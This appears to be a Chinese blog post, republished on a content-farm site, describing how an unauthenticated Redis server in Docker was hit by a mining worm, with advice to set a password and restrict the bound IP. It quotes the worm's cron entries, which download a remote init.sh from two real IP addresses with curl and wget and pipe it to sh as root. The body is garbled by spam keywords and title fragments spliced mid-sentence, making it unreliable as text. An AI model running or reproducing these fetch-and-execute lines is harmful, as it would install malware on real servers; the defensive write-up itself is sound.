数据观澜数据库
快捷导航
您的位置:首页>电脑教程>>事实证明,互联网会惩罚每一个裸奔的人之 Redis 扩散病毒 >

事实证明,互联网会惩罚每一个裸奔的人之 Redis 扩散病毒

  发布时间:2025-12-07 20:01:19   作者:玩站小弟   我要评论
前段时间换了台电脑,一大堆开发环境我实在是懒得在本地搞了,每次启动来启动去太麻烦了,索性直接在服务器上开 Docker 部署,docker pull复制粘贴什么 Redis、什么 MySQL 分分钟装 。

前段时间换了台电脑 ,事实证明一大堆开发环境我实在是互联懒得在本地搞了,每次启动来启动去太麻烦了 ,惩罚索性直接在服务器上开 Docker 部署,裸奔docker pull 复制粘贴什么 Redis、扩散什么 MySQL 分分钟装好 ,病毒要用的事实证明时候直接远程连接就行了 ,简直不要太方便 。互联

也不是惩罚什么业务场景让我发现了这么一个病毒,建站模板因为大部分 Redis Key 都是裸奔设置了过期时间的 ,开发过程也没感觉到什么问题,扩散纯粹是病毒有一天我闲着没事干 ,进入 Redis 命令行 keys * 看看 ,事实证明不看不要紧 ,互联一看好家伙,惩罚多出了几个 key,大概就是高防服务器下面这样子 :

复制uid:1 uid:2 uid:3 backup1 backup2 backup3 backup41.2.3.4.5.6.7.

多出了 4 个 backup 前缀的 key ,我第一反应这肯定是什么备份文件

正常情况下我根本不会在意   ,纯粹就是那天确实比较闲 ,不如来学习下 Redis 吧(哈哈),于是 ,禀着好学的基本素养,源码下载我分别查看了下这里面的 value 是什么:

复制*/2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh */5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh1.2.3.4.5.6.7.

wget 是用来下载东西的,curl 是用于执行 HTTP 请求 ,点开 http://45.83.123.29/cleanfda/init.sh 看看到底是什么脚本文件:

又是改权限,又是免费模板关防火墙删文件的,用屁股想都知道这 IP 肯定是国外的了 :

查了下发现这是一种 Redis 扩散病毒 ,专门利用 Redis 未授权访问漏洞的挖矿病毒。没错 ,就是 Redis 没设置密码 ,模板下载没授权,让病毒有了可乘之机 。如果服务暴露在互联网上就一定要设置密码 ,不要裸奔 😭 ,很多同学大部分时间都是在本地开发,没有设置密码的习惯或者只是简单的设置成 root 这种

另外,除了设置密码,服务器租用服务器开放端口的时候最好也指定下 IP,不然默认的 0.0.0.0:6379 任何 IP 都可以访问

  • Tag:

相关文章

  • 韩国N号房2.0事件大爆发,Deepfake究竟有多“邪恶”?

    怎么也不会想到,韩国“深度伪造”Deepfake)AI换脸事件闹大了后,韩国网友会来中国社交平台上发求助帖,并登上了热搜。*图片来源:微博在这次事件中,韩国男性用自己熟人的kakaotalk头像类似微
    2025-12-07

  • WIN10怎么校准颜色

    正常来说,电脑的颜色都是校准好的,但是难免有错误的时候,今天小编教大家如何在系统设置里校准win10电脑颜色,调整一个合适的显示器颜色是非常关键的,这会影响我们视觉体验。具体的教程一起来看看吧。WIN
    2025-12-07

  • win10商店怎么换区

    在使用win10商店的时候,很多的用户们都想要更换自己的地区进行商品的购买,但是又不知道在哪里更改自己的地区,那就快来看看详细的教程吧~win10商店怎么换区:第一种方法: 1、按下快捷键【win】+
    2025-12-07

  • thumbs.db是什么东西怎么删除

    我们在平常使用电脑的过程中,有些情况下可能会遇到出现一个不认识的文件:thumbs.db。很多小伙伴因为不知道这个组件是什么,想要将它删除。那么据小编所知这个文件是一个负责微软系统略缩图的文件,我们可
    2025-12-07

  • 各大供应商的GPU都容易受到新的像素窃取攻击

    四所美国大学的研究人员在周二发表的一篇论文中演示表明,六家主要供应商的GPU都容易受到一种新发现的攻击,这种攻击让恶意网站可以读取其他网站显示的用户名、密码及其他敏感的可视化数据。跨源攻击允许来自一个
    2025-12-07

  • KB4524151安装失败如何解决

    微软在推出了KB4524151补丁,我们在安装时遇见系统提示安装失败这种情况需要怎么办呢。小编觉得可以尝试使用内置系统优化软件或者更新升级最新的.net framework等等。更多具体详细内容请见下
    2025-12-07

最新评论